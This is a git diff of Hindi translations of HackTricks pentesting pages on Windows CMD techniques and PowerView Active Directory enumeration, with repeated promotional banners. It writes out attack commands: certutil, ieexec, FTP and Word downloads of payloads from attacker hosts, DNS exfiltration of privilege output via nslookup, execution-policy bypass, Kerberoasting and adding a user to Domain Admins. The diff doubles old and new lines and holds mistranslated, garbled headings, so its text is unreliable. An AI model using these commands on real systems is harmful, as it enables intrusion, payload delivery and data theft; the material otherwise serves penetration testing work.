**यहां अन्य तरीके हैं जिनका उपयोग करके प्रमाणीकरण को बलवान बनाने की कोशिश की जा सकती है:** **यहाँ अन्य तरीके हैं जिनका प्रयास करके प्रमाणीकरण को मजबूर करने के लिए:**
{% content-ref url="printers-spooler-service-abuse.md" %} {% content-ref url="printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](printers-spooler-service-abuse.md) [printers-spooler-service-abuse.md](printers-spooler-service-abuse.md)
{% endcontent-ref %} {% endcontent-ref %}
### रोकथाम ### संरोधन
* विशेष सेवाओं के लिए सीमित डीए/व्यवस्थापक लॉगिन करें * DA/Admin लॉगिन को विशेष सेवाओं पर सीमित करें
* उच्चाधिकारी खातों के लिए "खाता संवेदनशील है और इसे अधिग्रहण नहीं किया जा सकता" सेट करें। * विशेषाधिकारी खातों के लिए "खाता संवेदनशील है और यह अनुमति नहीं दी जा सकती" सेट करें।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
</details>

View file

@ -1,14 +1,14 @@
# बुनियादी विन्डोज़ CMD पेंटेस्टर्स के लिए # बेसिक विंडोज CMD पेंटेस्टर्स के लिए
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** [**hacktricks**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को पीआर जमा करके**। * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**।
</details> </details>
@ -32,14 +32,14 @@ DRIVERQUERY #3rd party driver vulnerable?
```bash ```bash
set #List all environment variables set #List all environment variables
``` ```
कुछ env variables को हाइलाइट करने के लिए: कुछ env variables को हाइलाइट करें:
* **COMPUTERNAME**: कंप्यूटर का नाम * **COMPUTERNAME**: कंप्यूटर का नाम
* **TEMP/TMP:** टेम्प फ़ोल्डर * **TEMP/TMP:** टेम्प फ़ोल्डर
* **USERNAME:** आपका उपयोगकर्ता नाम * **USERNAME:** आपका उपयोगकर्ता नाम
* **HOMEPATH/USERPROFILE:** होम डायरेक्टरी * **HOMEPATH/USERPROFILE:** होम डायरेक्टरी
* **windir:** C:\Windows * **windir:** C:\Windows
* **OS**: Windows ऑपरेटिंग सिस्टम * **OS**: विंडोज ओएस
* **LOGONSERVER**: डोमेन कंट्रोलर का नाम * **LOGONSERVER**: डोमेन कंट्रोलर का नाम
* **USERDNSDOMAIN**: DNS के साथ उपयोग करने के लिए डोमेन का नाम * **USERDNSDOMAIN**: DNS के साथ उपयोग करने के लिए डोमेन का नाम
* **USERDOMAIN**: डोमेन का नाम * **USERDOMAIN**: डोमेन का नाम
@ -53,7 +53,7 @@ wmic logicaldisk get caption,description,providername
``` ```
### [रक्षक](authentication-credentials-uac-and-efs.md#defender) ### [रक्षक](authentication-credentials-uac-and-efs.md#defender)
### कचरा बिन ### पुनर्चक्रव्यूह
```bash ```bash
dir C:\$Recycle.Bin /s /b dir C:\$Recycle.Bin /s /b
``` ```
@ -272,17 +272,19 @@ Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
``` ```
```html ```html
<p>CertReq.exe</p> <h2>कर्टरेक्वेस्ट.exe</h2>
``` ```
``` ```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
``` ```
Certutil.exe Certutil.exe
कर्न्टिल.एक्से
``` ```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
``` ```
```plaintext ```plaintext
डेस्कटॉपइमेजडाउनलोडर.exe डेस्कटॉपimgdownldr.exe
``` ```
``` ```
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
@ -315,31 +317,32 @@ extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr.exe Findstr.exe
``` ```
फाइंडस्ट्र.एक्सएएनएम् ```html
Findstr.exe
```
``` ```
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
``` ```
```plaintext ```plaintext
Ftp.exe Ftp.exe
``` ```
FTP.exe
``` ```
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
``` ```
```html ```plaintext
GfxDownloadWrapper.exe GfxDownloadWrapper.exe
``` ```
``` ```
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
``` ```
Hh.exe ```html
<h2>हेडर हंटर (Header Hunter)</h2>
```
``` ```
HH.exe http://some.url/script.ps1 HH.exe http://some.url/script.ps1
``` ```
```plaintext
Ieexec.exe Ieexec.exe
``` ```
```
ieexec.exe http://x.x.x.x:8080/bypass.exe ieexec.exe http://x.x.x.x:8080/bypass.exe
``` ```
```html ```html
@ -354,30 +357,11 @@ MpCmdRun.exe
``` ```
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
``` ```
```plaintext
**Replace.exe** **Replace.exe**
**विवरण** Replace.exe is a Windows utility that allows you to replace or update one or more files with another file. It can be used by pentesters to quickly replace sensitive files with harmless ones during security assessments.
`Replace.exe` एक Windows सिस्टम उपयोगकर्ताओं के लिए एक उपयोगी टूल है जो फ़ाइलों और डायरेक्टरीज़ को बदलने के लिए उपयोग किया जा सकता है। यह टूल विंडोज़ कमांड लाइन में उपलब्ध है और उपयोगकर्ताओं को फ़ाइलों को एक स्थान से दूसरे स्थान पर कॉपी करने और बदलने की अनुमति देता है।
**सिंटेक्स**
```plaintext
replace <लक्ष्य> <स्र> [/A] [/P] [/R] [/W] [/U] [/S] [/Q] [/T]
``` ```
**पैरामीटर्स**
- `<लक्ष्य>`: बदलने के लक्ष्य का पूरा पथ और फ़ाइल नाम।
- `<स्रोत>`: बदलने के लिए स्रोत फ़ाइल या डायरेक्टरी का पूरा पथ और नाम।
- `/A`: बदलने के लिए सभी फ़ाइलों को बदलने की अनुमति देता है।
- `/P`: पुष्टि के लिए पूछता है जब भी एक फ़ाइल को बदला जाए।
- `/R`: उपनामों को बदलने की अनुमति देता है।
- `/W`: बदलने के लिए विंडोज़ को बोलता है कि प्रक्रिया पूर्ण हो गई है जब तक यह पूरा नहीं हो जाता।
- `/U`: बदलने के लिए अनुमति देता है, लेकिन यह अद्यतन नहीं करता है।
- `/S`: उपनामों के लिए उपनामों के अंदर भी बदलने की अनुमति देता है।
- `/Q`: शांत रूप से काम करता है, बिना किसी पुष्टि के।
- `/T`: टेम्पलेट फ़ाइल का उपयोग करता है।
``` ```
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
``` ```
@ -397,16 +381,16 @@ Squirrel.exe
``` ```
squirrel.exe --download [url to package] squirrel.exe --download [url to package]
``` ```
```html ```plaintext
<h2>Update.exe</h2>
```
अपडेट.exe अपडेट.exe
``` ```
```
Update.exe --download [url to package] Update.exe --download [url to package]
``` ```
```plaintext
Winword.exe Winword.exe
``` ```
```
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll" winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
``` ```
```html ```html
@ -473,9 +457,9 @@ help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding encoding
``` ```
### सुनने का पता ACLs ### सुनिए पता ACLs
आप व्यवस्थापक न होते हुए [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) पर सुन सकते हैं। आप [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) पर ऐडमिनिस्ट्रेटर बिना सुन सकते हैं।
```bash ```bash
netsh http show urlacl netsh http show urlacl
``` ```
@ -503,7 +487,7 @@ for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"')
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
``` ```
## C संकेत से CMD को कॉल करना ## C संकेत से CMD को बुलाना
```c ```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */ #include <stdlib.h> /* system, NULL, EXIT_FAILURE */
@ -550,10 +534,10 @@ powershell -ep bypass - < c:\temp:ttt
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पता लगाना चाहते हैं या PEASS को डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं या पीईएएस को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें * हमारे विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) को PRs सबमिट करके * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -4,19 +4,19 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**. * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>
PowerView का सबसे अद्यतन संस्करण हमेशा PowerSploit की dev शाखा में रहेगा: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) PowerView का सबसे अद्यतन संस्करण हमेशा PowerSploit के डेव शाखा में होगा: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
[**SharpView**](https://github.com/tevora-threat/SharpView) यह [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) का .NET पोर्ट है [**SharpView**](https://github.com/tevora-threat/SharpView) एक .NET पोर्ट है [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
### त्वरित परिगणना ### त्वरित गणना
```powershell ```powershell
Get-NetDomain #Basic domain info Get-NetDomain #Basic domain info
#User info #User info
@ -136,7 +136,7 @@ Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -
Get-NetOU #Get Organization Units Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case) Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
``` ```
### लॉगऑन और सेशन्स ### लॉगऑन और सत्र
```powershell ```powershell
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target) Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host Get-NetSession -ComputerName <servername> #Get active sessions on the host
@ -144,10 +144,10 @@ Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the mom
Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host) Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host) Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
``` ```
### ग्रुप पॉलिसी ऑब्जेक्ट - GPOs ### समूह नीति वस्तु - जीपीओ
यदि हमलावर के पास **GPO पर उच्च विशेषाधिकार** हैं, तो वह इसका दुरुपयोग करके **privesc** कर सकता है, जैसे कि **एक उपयोगकर्ता को अनुमतियाँ जोड़ना**, **क स्थानीय व्यवस्थापक उपयोगकर्ता को होस्ट में जोड़ना** या **निर्धारित कार्य बनाना** (तत्काल) कोई कार्य करने के लिए।\ यदि किसी हमलावर के पास **जीपीओ पर उच्च विशेषाधिकार** होते हैं, तो वह इसका दुरुपयोग करके **उच्चतम अधिकार (privesc)** प्राप्त कर सकता है, **एक उपयोगकर्ता को अनुमतियाँ जोड़ना**, **िसी होस्ट में स्थानीय व्यवस्थापक उपयोगकर्ता जोड़ना** या **किसी कार्रवाई को करने के लिए तत्काल एक निर्धारित कार्य (scheduled task) बनाना**।\
[**इसके बारे में अधिक जानकारी और इसका दुरुपयोग कैसे करें इस लिंक का अनुसरण करें**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation). [**इसके बारे में अधिक जानकारी और इसका दुरुपयोग कैसे करें, उसके लिए इस लिंक पर क्लिक करें**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
```powershell ```powershell
#GPO #GPO
Get-DomainGPO | select displayName #Check the names for info Get-DomainGPO | select displayName #Check the names for info
@ -181,7 +181,7 @@ Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
# Enumerates the machines where a specific domain user/group is a member of a specific local group. # Enumerates the machines where a specific domain user/group is a member of a specific local group.
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
``` ```
जानें कैसे **GPOs और ACLs पर अनुमतियों का शोषण करें**: सीखें कैसे **GPOs और ACLs पर अनुमतियों का शोषण करें**:
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %} {% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/) [acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
@ -208,13 +208,13 @@ Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUser
#Get special rights over All administrators in domain #Get special rights over All administrators in domain
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
``` ```
### साझा की गई फ़ाइलें और फ़ोल्डर्स ### साझा फ़ाइलें और फ़ोल्डर
```powershell ```powershell
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares Find-DomainShare -CheckShareAccess #Search readable shares
Find-InterestingDomainShareFile #Find interesting files, can use filters Find-InterestingDomainShareFile #Find interesting files, can use filters
``` ```
### डोमेन ट्रस्ट ### डोमेन विश्वास
```powershell ```powershell
Get-NetDomainTrust #Get all domain trusts (parent, children and external) Get-NetDomainTrust #Get all domain trusts (parent, children and external)
Get-DomainTrust #Same Get-DomainTrust #Same
@ -231,7 +231,7 @@ Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between
Get-DomainForeingUser #Get users with privileges in other domains inside the forest Get-DomainForeingUser #Get users with privileges in other domains inside the forest
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
``` ```
### निम्न-स्तरीय सुलभ लक्ष्य ### कमीनी फल
```powershell ```powershell
#Check if any user passwords are set #Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@ -285,14 +285,14 @@ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```powershell ```powershell
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
``` ```
#### विभिन्न प्रमाणपत्र (तर्क) का उपयोग करें #### विभिन्न प्रमाणीकरण का उपयोग (विधान)
```powershell ```powershell
# use an alterate creadential for any function # use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred Get-DomainUser -Credential $Cred
``` ```
#### एक उपयोगकर्ता का अनुकरण करें #### उपयोगकर्ता का अनुकरण
```powershell ```powershell
# if running in -sta mode, impersonate another credential a la "runas /netonly" # if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
@ -316,10 +316,10 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
